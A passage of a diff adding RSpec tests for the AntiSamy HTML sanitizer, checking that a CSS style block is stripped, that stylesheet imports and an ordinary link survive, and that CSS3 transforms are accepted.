+      "<style type=\"text/css\"><![CDATA[P {  margin-bottom: 0.08in; } ]]></style>" => "margin"
+    }.each_pair do |k,v|
+      it "should remove #{v} from #{k} for href attacks" do
+        r = AntiSamy.scan(k,policy_object)
+        r.clean_html.should_not include(v)
+      end
+    end
+    it "shoud import some stylesheets" do
+      input = "<style>@import url(http://www.owasp.org/skins/monobook/main.css);@import url(http://www.w3schools.com/stdtheme.css);@import url(http://www.google.com/ig/f/t1wcX5O39cc/ig.css); </style>"
+      r = AntiSamy.scan(input,policy_object)
+      r.clean_html.should_not be_empty
+    end
+    it "should not touch this url" do
+      input = "<a href=\"http://www.aspectsecurity.com\">Aspect Security</a>"
+      r = AntiSamy.scan(input,policy_object)
+      r.clean_html.should == input
+    end
+	it "should accept css3" do
+		input = "<style> div{transform:rotate(30deg);} </style>"
+		r = AntiSamy.scan(input,policy_object)
+        r.clean_html.should == input
+	end
+  end
+end